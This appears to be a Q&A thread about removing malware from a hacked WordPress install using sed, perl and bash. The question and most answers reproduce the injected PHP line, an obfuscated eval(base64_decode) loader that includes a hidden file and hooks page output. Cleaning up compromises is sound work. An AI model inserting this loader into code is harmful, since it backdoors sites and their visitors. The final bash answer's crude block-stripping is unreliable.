# Command line find a large string and replace on all files in a subdirectory

Tags: regex, perl, bash, sed

I've got a hacked wordpress install I'd like to clean up.  Every single .php file has had this inserted at the top:

```
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
```

I'd like to replace that string with nothing in every .php file in the wordpress directory including subs.  What's my best option?  I've got bash, python, perl, php and so on.

I've tried:

```
perl -pi -e 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
Bareword found where operator expected at -e line 1, near "s/<?php\ /**/eval"
syntax error at -e line 1, near "s/<?php\ /**/eval"
Identifier too long at -e line 1.
```

and

```
sed -i 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
sed: -e expression #1, char 15: unknown option to `s'
```

Answer (score 4, accepted):

```
#!/usr/bin/perl
use warnings;
use strict;
use File::Find;

# get a list of files
local @ARGV;
find sub {push @ARGV, $File::Find::name if /\.php$/}, '.';

# do in-place editing
$^I = '.bak';
while (<>) {
    print unless $_ eq "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>\n";
}
```

Comment: Look Ma! No regular expression!

Answer (score 3):

Note that in your base string, you already have the reg-exp delimiter used by default (and you are using) the '/' char in your perl and sed.

You can either escape all those like '\/' OR you can use a different char for the reg-exp delimiter. For sed, try

```
sed -i 's@<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>@@g' *.php
```

For some seds, you have to 'tell' sed you are changing up. only the initial reg-exp delimiter needs an esacpe char, i.e. `sed -k 's\@<....@@g' *.php`

I hope this helps.

P.S. as you appear to be a new user, if you get an answer that helps you please remember to mark it as accepted, and/or give it a + (or -) as a useful answer.

Answer (score 2):

The problem is that '/' exists in the string you want to match, and you are using '/' as your pattern delimiter.  Luckily, Perl allows you to specify alternate delimiters, so use one that is not in the string you are matching:

```
perl -pn -i.bak -e "s{<?php\ /\*\*/eval\(base64_decode\('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\)\);\ \?>}{}g;" `find . -name '*.php'`
```

I modified the command a bit.  It is always good practice to create backup files when doing in-place edits in case there is an error or you need to verify (via diff) that the command did what you expect (I have a perl program that allows me to easily rename the .bak files back in case I need to reset things).

I also use a find command to get the list of all .php files in and below the current directory.  If working in a flat directory, your *.php is sufficient.

You also need to escape regex specials in the string you want to match.  Example the '*', '?', and '()' characters need to be escaped.

If the command works as expected, you can run the following command to remove the .bak files:

```
/bin/rm `find . -name '*.bak'`
```

Answer (score 1):

Try this:

```
sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//' *.php
```

Things I changed:

- escaped all regexp symbols in your code (e.g. `(`, `)`, `*` and `?`)
- replaced `'` with `'\''` in your code, which is the only way to put a `'` in a `'`-delimited string in bash

If you want to recursively replace `*.php` even in subdirectories of this directory:

```
find -print0 | xargs -0 sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//'
```

Note that I've used `-print0` and `-0` so it doesn't break with files with spaces.

Comment: The first part works great thanks!  The second part fails with: sed: couldn't edit .: not a regular file
sed: couldn't edit ./wp-admin/images/.svn/props: not a regular file

Comment: My bad ... it does work.  I didn't notice the files it missed were .bak files.

Answer (score 1):

```
find ./*php | xargs -t -i perl -pi -e "s/<\?php\s+\/\*\*\/eval\(base64_decode\(\'\S+\'\)\);\s+\?>//;" {}
```

Feel free to substitute the ginormous base64 string instead of `\S+`

Answer (score 1):

Here's a bash 4+ script

```
#!/bin/bash
shopt -s globstar
shopt -s nullglob

for php in **/*.php
do
    data=$(<"$php")
    a=${data%%<?php*}
    echo "$a ${data#*?>}" > t && mv t "$php"
done
```